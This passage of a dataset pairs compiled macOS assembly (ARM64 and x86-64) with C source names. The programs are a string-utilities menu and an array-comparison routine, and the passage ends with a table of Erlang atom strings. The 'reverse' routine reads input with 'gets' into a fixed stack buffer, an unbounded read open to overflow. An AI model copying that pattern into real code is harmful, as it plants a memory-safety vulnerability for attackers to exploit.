cset w8, ne
tbnz w8, #0, LBB5_7
b LBB5_6
LBB5_6: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.11@PAGE
add x0, x0, l_.str.11@PAGEOFF
bl _printf
b LBB5_8
LBB5_7: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.12@PAGE
add x0, x0, l_.str.12@PAGEOFF
bl _printf
b LBB5_8
LBB5_8: ; in Loop: Header=BB5_1 Depth=1
b LBB5_12
LBB5_9: ; in Loop: Header=BB5_1 Depth=1
adrp x0, l_.str.13@PAGE
add x0, x0, l_.str.13@PAGEOFF
bl _printf
mov x9, sp
sub x8, x29, #24
str x8, [sp, #16] ; 8-byte Folded Spill
str x8, [x9]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
bl _scanf
ldr x8, [sp, #16] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.14@PAGE
add x0, x0, l_.str.14@PAGEOFF
bl _printf
adrp x0, l_.str.15@PAGE
add x0, x0, l_.str.15@PAGEOFF
bl _printf
ldr x1, [sp, #16] ; 8-byte Folded Reload
sub x0, x29, #44
str x0, [sp, #24] ; 8-byte Folded Spill
bl _copy_string
ldr x8, [sp, #24] ; 8-byte Folded Reload
mov x9, sp
str x8, [x9]
adrp x0, l_.str.16@PAGE
add x0, x0, l_.str.16@PAGEOFF
bl _printf
b LBB5_12
LBB5_10:
bl _reverse
bl _reverse
mov x9, sp
; implicit-def: $x8
mov x8, x0
str x8, [x9]
adrp x0, l_.str.17@PAGE
add x0, x0, l_.str.17@PAGEOFF
bl _printf
b LBB5_11
LBB5_11:
mov w0, #0
bl _exit
LBB5_12: ; in Loop: Header=BB5_1 Depth=1
b LBB5_1
.cfi_endproc
.p2align 2
lJTI5_0:
.long LBB5_3-Ltmp1
.long LBB5_4-Ltmp1
.long LBB5_5-Ltmp1
.long LBB5_9-Ltmp1
.long LBB5_10-Ltmp1
.long LBB5_11-Ltmp1
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Input a string\n"
l_.str.1: ; @.str.1
.asciz "%s\n"
l_.str.2: ; @.str.2
.asciz "\n1. Find Length \n2. Concatenate \n3. Compare \n4. Copy \n5. Reverse6. Exit\n"
l_.str.3: ; @.str.3
.asciz "Enter your choice: "
l_.str.4: ; @.str.4
.asciz "%d"
l_.str.5: ; @.str.5
.asciz "Enter the string: "
l_.str.6: ; @.str.6
.asciz "%s"
l_.str.7: ; @.str.7
.asciz "The length of string is %d"
l_.str.8: ; @.str.8
.asciz "Enter two strings: "
l_.str.9: ; @.str.9
.asciz "%s%s"
l_.str.10: ; @.str.10
.asciz "The concatenated string is %s"
l_.str.11: ; @.str.11
.asciz "They are equal"
l_.str.12: ; @.str.12
.asciz "They are not equal"
l_.str.13: ; @.str.13
.asciz "Enter a string: "
l_.str.14: ; @.str.14
.asciz "String1 = %s\n"
l_.str.15: ; @.str.15
.asciz "After copying string1 to string 2\n"
l_.str.16: ; @.str.16
.asciz "String2 = %s"
l_.str.17: ; @.str.17
.asciz "The reverse of string is: %s"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _find_length ## -- Begin function find_length
.p2align 4, 0x90
_find_length: ## @find_length
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
movl $0, -16(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rax
movslq -16(%rbp), %rcx
movsbl (%rax,%rcx), %eax
cmpl $0, %eax
je LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB0_1
LBB0_4:
movl -12(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _join_strings ## -- Begin function join_strings
.p2align 4, 0x90
_join_strings: ## @join_strings
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
callq _find_length
movl %eax, -24(%rbp)
movq -16(%rbp), %rdi
callq _find_length
movl %eax, -28(%rbp)
movl -24(%rbp), %eax
movl %eax, -20(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -20(%rbp), %eax
movl -24(%rbp), %ecx
addl -28(%rbp), %ecx
cmpl %ecx, %eax
jge LBB1_4
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -16(%rbp), %rax
movl -20(%rbp), %ecx
subl -24(%rbp), %ecx
movslq %ecx, %rcx
movb (%rax,%rcx), %dl
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movb %dl, (%rax,%rcx)
## %bb.3: ## in Loop: Header=BB1_1 Depth=1
movl -20(%rbp), %eax
addl $1, %eax
movl %eax, -20(%rbp)
jmp LBB1_1
LBB1_4:
movq -8(%rbp), %rax
movslq -20(%rbp), %rcx
movb $0, (%rax,%rcx)
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _compare_strings ## -- Begin function compare_strings
.p2align 4, 0x90
_compare_strings: ## @compare_strings
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -16(%rbp)
movq %rsi, -24(%rbp)
movl $0, -40(%rbp)
movq -16(%rbp), %rdi
callq _find_length
movl %eax, -28(%rbp)
movq -24(%rbp), %rdi
callq _find_length
movl %eax, -32(%rbp)
movl -28(%rbp), %eax
cmpl -32(%rbp), %eax
je LBB2_2
## %bb.1:
movl $1, -4(%rbp)
jmp LBB2_11
LBB2_2:
movl $0, -36(%rbp)
LBB2_3: ## =>This Inner Loop Header: Depth=1
movl -36(%rbp), %eax
cmpl -28(%rbp), %eax
jge LBB2_8
## %bb.4: ## in Loop: Header=BB2_3 Depth=1
movq -16(%rbp), %rax
movslq -36(%rbp), %rcx
movsbl (%rax,%rcx), %eax
movq -24(%rbp), %rcx
movslq -36(%rbp), %rdx
movsbl (%rcx,%rdx), %ecx
cmpl %ecx, %eax
jne LBB2_6
## %bb.5: ## in Loop: Header=BB2_3 Depth=1
movl -40(%rbp), %eax
addl $1, %eax
movl %eax, -40(%rbp)
LBB2_6: ## in Loop: Header=BB2_3 Depth=1
jmp LBB2_7
LBB2_7: ## in Loop: Header=BB2_3 Depth=1
movl -36(%rbp), %eax
addl $1, %eax
movl %eax, -36(%rbp)
jmp LBB2_3
LBB2_8:
movl -40(%rbp), %eax
cmpl -28(%rbp), %eax
jne LBB2_10
## %bb.9:
movl $0, -4(%rbp)
jmp LBB2_11
LBB2_10:
movl $1, -4(%rbp)
LBB2_11:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _copy_string ## -- Begin function copy_string
.p2align 4, 0x90
_copy_string: ## @copy_string
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rdi
callq _find_length
movl %eax, -20(%rbp)
movl $0, -24(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB3_4
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movb (%rax,%rcx), %dl
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movb %dl, (%rax,%rcx)
## %bb.3: ## in Loop: Header=BB3_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB3_1
LBB3_4:
movq -8(%rbp), %rax
movslq -24(%rbp), %rcx
movb $0, (%rax,%rcx)
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _reverse ## -- Begin function reverse
.p2align 4, 0x90
_reverse: ## @reverse
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $2048, %rsp ## imm = 0x800
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -2032(%rbp)
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
leaq -1008(%rbp), %rdi
callq _gets
LBB4_1: ## =>This Inner Loop Header: Depth=1
movslq -2032(%rbp), %rax
movsbl -1008(%rbp,%rax), %eax
cmpl $0, %eax
je LBB4_3
## %bb.2: ## in Loop: Header=BB4_1 Depth=1
movl -2032(%rbp), %eax
addl $1, %eax
movl %eax, -2032(%rbp)
jmp LBB4_1
LBB4_3:
movl -2032(%rbp), %eax
subl $1, %eax
movl %eax, -2028(%rbp)
movl $0, -2024(%rbp)
LBB4_4: ## =>This Inner Loop Header: Depth=1
movl -2024(%rbp), %eax
cmpl -2032(%rbp), %eax
jge LBB4_7
## %bb.5: ## in Loop: Header=BB4_4 Depth=1
movslq -2028(%rbp), %rax
movb -1008(%rbp,%rax), %cl
movslq -2024(%rbp), %rax
movb %cl, -2016(%rbp,%rax)
movl -2028(%rbp), %eax
addl $-1, %eax
movl %eax, -2028(%rbp)
## %bb.6: ## in Loop: Header=BB4_4 Depth=1
movl -2024(%rbp), %eax
addl $1, %eax
movl %eax, -2024(%rbp)
jmp LBB4_4
LBB4_7:
movslq -2024(%rbp), %rax
movb $0, -2016(%rbp,%rax)
leaq -2016(%rbp), %rsi
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
movl -2020(%rbp), %eax
movl %eax, -2036(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB4_9
## %bb.8:
movl -2036(%rbp), %eax ## 4-byte Reload
addq $2048, %rsp ## imm = 0x800
popq %rbp
retq
LBB4_9:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $96, %rsp
movl $0, -4(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
leaq L_.str.2(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movb %al, -81(%rbp) ## 1-byte Spill
callq _printf
## kill: def $ecx killed $eax
movb -81(%rbp), %al ## 1-byte Reload
leaq L_.str.3(%rip), %rdi
callq _printf
## kill: def $ecx killed $eax
movb -81(%rbp), %al ## 1-byte Reload
leaq L_.str.4(%rip), %rdi
leaq -68(%rbp), %rsi
callq _scanf
movl -68(%rbp), %eax
decl %eax
movl %eax, %ecx
movq %rcx, -80(%rbp) ## 8-byte Spill
subl $5, %eax
ja LBB5_11
## %bb.12: ## in Loop: Header=BB5_1 Depth=1
movq -80(%rbp), %rax ## 8-byte Reload
leaq LJTI5_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB5_2: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
leaq -32(%rbp), %rsi
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _scanf
leaq -32(%rbp), %rdi
callq _find_length
movl %eax, %esi
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_11
LBB5_3: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
leaq -32(%rbp), %rsi
leaq -64(%rbp), %rdx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _scanf
leaq -32(%rbp), %rdi
leaq -64(%rbp), %rsi
callq _join_strings
leaq -32(%rbp), %rsi
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_11
LBB5_4: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
leaq -32(%rbp), %rsi
leaq -64(%rbp), %rdx
leaq L_.str.9(%rip), %rdi
movb $0, %al
callq _scanf
leaq -32(%rbp), %rdi
leaq -64(%rbp), %rsi
callq _compare_strings
cmpl $0, %eax
jne LBB5_6
## %bb.5: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_7
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
LBB5_7: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_11
LBB5_8: ## in Loop: Header=BB5_1 Depth=1
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
leaq -32(%rbp), %rsi
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _scanf
leaq -32(%rbp), %rsi
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
leaq L_.str.15(%rip), %rdi
movb $0, %al
callq _printf
leaq -64(%rbp), %rdi
leaq -32(%rbp), %rsi
callq _copy_string
leaq -64(%rbp), %rsi
leaq L_.str.16(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB5_11
LBB5_9:
callq _reverse
callq _reverse
movl %eax, %esi
leaq L_.str.17(%rip), %rdi
movb $0, %al
callq _printf
LBB5_10:
xorl %edi, %edi
callq _exit
LBB5_11: ## in Loop: Header=BB5_1 Depth=1
jmp LBB5_1
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L5_0_set_2, LBB5_2-LJTI5_0
.set L5_0_set_3, LBB5_3-LJTI5_0
.set L5_0_set_4, LBB5_4-LJTI5_0
.set L5_0_set_8, LBB5_8-LJTI5_0
.set L5_0_set_9, LBB5_9-LJTI5_0
.set L5_0_set_10, LBB5_10-LJTI5_0
LJTI5_0:
.long L5_0_set_2
.long L5_0_set_3
.long L5_0_set_4
.long L5_0_set_8
.long L5_0_set_9
.long L5_0_set_10
.end_data_region
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Input a string\n"
L_.str.1: ## @.str.1
.asciz "%s\n"
L_.str.2: ## @.str.2
.asciz "\n1. Find Length \n2. Concatenate \n3. Compare \n4. Copy \n5. Reverse6. Exit\n"
L_.str.3: ## @.str.3
.asciz "Enter your choice: "
L_.str.4: ## @.str.4
.asciz "%d"
L_.str.5: ## @.str.5
.asciz "Enter the string: "
L_.str.6: ## @.str.6
.asciz "%s"
L_.str.7: ## @.str.7
.asciz "The length of string is %d"
L_.str.8: ## @.str.8
.asciz "Enter two strings: "
L_.str.9: ## @.str.9
.asciz "%s%s"
L_.str.10: ## @.str.10
.asciz "The concatenated string is %s"
L_.str.11: ## @.str.11
.asciz "They are equal"
L_.str.12: ## @.str.12
.asciz "They are not equal"
L_.str.13: ## @.str.13
.asciz "Enter a string: "
L_.str.14: ## @.str.14
.asciz "String1 = %s\n"
L_.str.15: ## @.str.15
.asciz "After copying string1 to string 2\n"
L_.str.16: ## @.str.16
.asciz "String2 = %s"
L_.str.17: ## @.str.17
.asciz "The reverse of string is: %s"
.subsections_via_symbols
| the_stack_data/640110.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_array ; -- Begin function read_array
.p2align 2
_read_array: ; @read_array
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
mov x9, sp
add x8, sp, #16
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
stur wzr, [x29, #-12]
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
ldur w8, [x29, #-12]
ldr w9, [sp, #16]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_4
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
ldur x8, [x29, #-8]
ldursw x9, [x29, #-12]
add x8, x8, x9, lsl #2
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
b LBB0_3
LBB0_3: ; in Loop: Header=BB0_1 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB0_1
LBB0_4:
ldr w0, [sp, #16]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _present ; -- Begin function present
.p2align 2
_present: ; @present
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
str x0, [sp, #16]
str w1, [sp, #12]
str w2, [sp, #8]
str wzr, [sp, #4]
b LBB1_1
LBB1_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #4]
ldr w9, [sp, #12]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB1_6
b LBB1_2
LBB1_2: ; in Loop: Header=BB1_1 Depth=1
ldr x8, [sp, #16]
ldrsw x9, [sp, #4]
ldr w8, [x8, x9, lsl #2]
ldr w9, [sp, #8]
subs w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB1_4
b LBB1_3
LBB1_3:
mov w8, #1
str w8, [sp, #28]
b LBB1_7
LBB1_4: ; in Loop: Header=BB1_1 Depth=1
b LBB1_5
LBB1_5: ; in Loop: Header=BB1_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB1_1
LBB1_6:
str wzr, [sp, #28]
b LBB1_7
LBB1_7:
ldr w0, [sp, #28]
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #224
.cfi_def_cfa_offset 224
stp x29, x30, [sp, #208] ; 16-byte Folded Spill
add x29, sp, #208
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
str wzr, [sp, #36]
sub x0, x29, #88
bl _read_array
str w0, [sp, #32]
add x0, sp, #40
bl _read_array
str w0, [sp, #28]
str wzr, [sp, #20]
str wzr, [sp, #16]
str wzr, [sp, #24]
b LBB2_1
LBB2_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #24]
ldr w9, [sp, #32]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB2_9
b LBB2_2
LBB2_2: ; in Loop: Header=BB2_1 Depth=1
ldr w1, [sp, #28]
ldrsw x9, [sp, #24]
sub x8, x29, #88
ldr w2, [x8, x9, lsl #2]
add x0, sp, #40
bl _present
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB2_7
b LBB2_3
LBB2_3: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_5
b LBB2_4
LBB2_4: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #20]
ldrsw x10, [sp, #24]
sub x9, x29, #88
ldr w9, [x9, x10, lsl #2]
subs w8, w8, w9
cset w8, le
tbnz w8, #0, LBB2_6
b LBB2_5
LBB2_5: ; in Loop: Header=BB2_1 Depth=1
mov w8, #1
str w8, [sp, #16]
ldrsw x9, [sp, #24]
sub x8, x29, #88
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #20]
b LBB2_6
LBB2_6: ; in Loop: Header=BB2_1 Depth=1
b LBB2_7
LBB2_7: ; in Loop: Header=BB2_1 Depth=1
b LBB2_8
LBB2_8: ; in Loop: Header=BB2_1 Depth=1
ldr w8, [sp, #24]
add w8, w8, #1
str w8, [sp, #24]
b LBB2_1
LBB2_9:
ldr w8, [sp, #16]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB2_11
b LBB2_10
LBB2_10:
ldr w9, [sp, #20]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _printf
b LBB2_12
LBB2_11:
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _printf
b LBB2_12
LBB2_12:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB2_14
b LBB2_13
LBB2_13:
bl ___stack_chk_fail
LBB2_14:
mov w0, #0
ldp x29, x30, [sp, #208] ; 16-byte Folded Reload
add sp, sp, #224
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "%d"
l_.str.1: ; @.str.1
.asciz "NO"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _read_array ## -- Begin function read_array
.p2align 4, 0x90
_read_array: ## @read_array
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
leaq L_.str(%rip), %rdi
leaq -16(%rbp), %rsi
movb $0, %al
callq _scanf
movl $0, -12(%rbp)
LBB0_1: ## =>This Inner Loop Header: Depth=1
movl -12(%rbp), %eax
cmpl -16(%rbp), %eax
jge LBB0_4
## %bb.2: ## in Loop: Header=BB0_1 Depth=1
movq -8(%rbp), %rsi
movslq -12(%rbp), %rax
shlq $2, %rax
addq %rax, %rsi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _scanf
## %bb.3: ## in Loop: Header=BB0_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB0_1
LBB0_4:
movl -16(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _present ## -- Begin function present
.p2align 4, 0x90
_present: ## @present
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
movl %esi, -20(%rbp)
movl %edx, -24(%rbp)
movl $0, -28(%rbp)
LBB1_1: ## =>This Inner Loop Header: Depth=1
movl -28(%rbp), %eax
cmpl -20(%rbp), %eax
jge LBB1_6
## %bb.2: ## in Loop: Header=BB1_1 Depth=1
movq -16(%rbp), %rax
movslq -28(%rbp), %rcx
movl (%rax,%rcx,4), %eax
cmpl -24(%rbp), %eax
jne LBB1_4
## %bb.3:
movl $1, -4(%rbp)
jmp LBB1_7
LBB1_4: ## in Loop: Header=BB1_1 Depth=1
jmp LBB1_5
LBB1_5: ## in Loop: Header=BB1_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB1_1
LBB1_6:
movl $0, -4(%rbp)
LBB1_7:
movl -4(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $208, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -180(%rbp)
leaq -96(%rbp), %rdi
callq _read_array
movl %eax, -184(%rbp)
leaq -176(%rbp), %rdi
callq _read_array
movl %eax, -188(%rbp)
movl $0, -196(%rbp)
movl $0, -200(%rbp)
movl $0, -192(%rbp)
LBB2_1: ## =>This Inner Loop Header: Depth=1
movl -192(%rbp), %eax
cmpl -184(%rbp), %eax
jge LBB2_9
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
leaq -176(%rbp), %rdi
movl -188(%rbp), %esi
movslq -192(%rbp), %rax
movl -96(%rbp,%rax,4), %edx
callq _present
cmpl $0, %eax
jne LBB2_7
## %bb.3: ## in Loop: Header=BB2_1 Depth=1
cmpl $0, -200(%rbp)
je LBB2_5
## %bb.4: ## in Loop: Header=BB2_1 Depth=1
movl -196(%rbp), %eax
movslq -192(%rbp), %rcx
cmpl -96(%rbp,%rcx,4), %eax
jle LBB2_6
LBB2_5: ## in Loop: Header=BB2_1 Depth=1
movl $1, -200(%rbp)
movslq -192(%rbp), %rax
movl -96(%rbp,%rax,4), %eax
movl %eax, -196(%rbp)
LBB2_6: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_7
LBB2_7: ## in Loop: Header=BB2_1 Depth=1
jmp LBB2_8
LBB2_8: ## in Loop: Header=BB2_1 Depth=1
movl -192(%rbp), %eax
addl $1, %eax
movl %eax, -192(%rbp)
jmp LBB2_1
LBB2_9:
cmpl $0, -200(%rbp)
je LBB2_11
## %bb.10:
movl -196(%rbp), %esi
leaq L_.str(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB2_12
LBB2_11:
leaq L_.str.1(%rip), %rdi
movb $0, %al
callq _printf
LBB2_12:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_14
## %bb.13:
xorl %eax, %eax
addq $208, %rsp
popq %rbp
retq
LBB2_14:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%d"
L_.str.1: ## @.str.1
.asciz "NO"
.subsections_via_symbols
| the_stack_data/632494.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "false"
l_.str.1: ; @.str.1
.asciz "true"
l_.str.2: ; @.str.2
.asciz "_"
l_.str.3: ; @.str.3
.asciz "nonode@nohost"
l_.str.4: ; @.str.4
.asciz "$end_of_table"
l_.str.5: ; @.str.5
.space 1
l_.str.6: ; @.str.6
.asciz "fun"
l_.str.7: ; @.str.7
.asciz "infinity"
l_.str.8: ; @.str.8
.asciz "timeout"
l_.str.9: ; @.str.9
.asciz "normal"
l_.str.10: ; @.str.10
.asciz "call"
l_.str.11: ; @.str.11
.asciz "return"
l_.str.12: ; @.str.12
.asciz "throw"
l_.str.13: ; @.str.13
.asciz "error"
l_.str.14: ; @.str.14
.asciz "exit"
l_.str.15: ; @.str.15
.asciz "undefined"
l_.str.16: ; @.str.16
.asciz "nocatch"
l_.str.17: ; @.str.17
.asciz "undefined_function"
l_.str.18: ; @.str.18
.asciz "undefined_lambda"
l_.str.19: ; @.str.19
.asciz "3RT$"
l_.str.20: ; @.str.20
.asciz "DOWN"
l_.str.21: ; @.str.21
.asciz "UP"
l_.str.22: ; @.str.22
.asciz "EXIT"
l_.str.23: ; @.str.23
.asciz "abort"
l_.str.24: ; @.str.24
.asciz "aborted"
l_.str.25: ; @.str.25
.asciz "abs_path"
l_.str.26: ; @.str.26
.asciz "absoluteURI"
l_.str.27: ; @.str.27
.asciz "ac"
l_.str.28: ; @.str.28
.asciz "accessor"
l_.str.29: ; @.str.29
.asciz "active"
l_.str.30: ; @.str.30
.asciz "active_tasks"
l_.str.31: ; @.str.31
.asciz "active_tasks_all"
l_.str.32: ; @.str.32
.asciz "alive"
l_.str.33: ; @.str.33
.asciz "all"
l_.str.34: ; @.str.34
.asciz "all_but_first"
l_.str.35: ; @.str.35
.asciz "all_names"
l_.str.36: ; @.str.36
.asciz "alloc_info"
l_.str.37: ; @.str.37
.asciz "alloc_sizes"
l_.str.38: ; @.str.38
.asciz "allocated"
l_.str.39: ; @.str.39
.asciz "allocated_areas"
l_.str.40: ; @.str.40
.asciz "allocator"
l_.str.41: ; @.str.41
.asciz "allocator_sizes"
l_.str.42: ; @.str.42
.asciz "alloc_util_allocators"
l_.str.43: ; @.str.43
.asciz "allow_gc"
l_.str.44: ; @.str.44
.asciz "allow_passive_connect"
l_.str.45: ; @.str.45
.asciz "already_loaded"
l_.str.46: ; @.str.46
.asciz "amd64"
l_.str.47: ; @.str.47
.asciz "anchored"
l_.str.48: ; @.str.48
.asciz "and"
l_.str.49: ; @.str.49
.asciz "andalso"
l_.str.50: ; @.str.50
.asciz "andthen"
l_.str.51: ; @.str.51
.asciz "any"
l_.str.52: ; @.str.52
.asciz "anycrlf"
l_.str.53: ; @.str.53
.asciz "apply"
l_.str.54: ; @.str.54
.asciz "args"
l_.str.55: ; @.str.55
.asciz "arg0"
l_.str.56: ; @.str.56
.asciz "arity"
l_.str.57: ; @.str.57
.asciz "asn1"
l_.str.58: ; @.str.58
.asciz "async"
l_.str.59: ; @.str.59
.asciz "asynchronous"
l_.str.60: ; @.str.60
.asciz "atom"
l_.str.61: ; @.str.61
.asciz "atom_used"
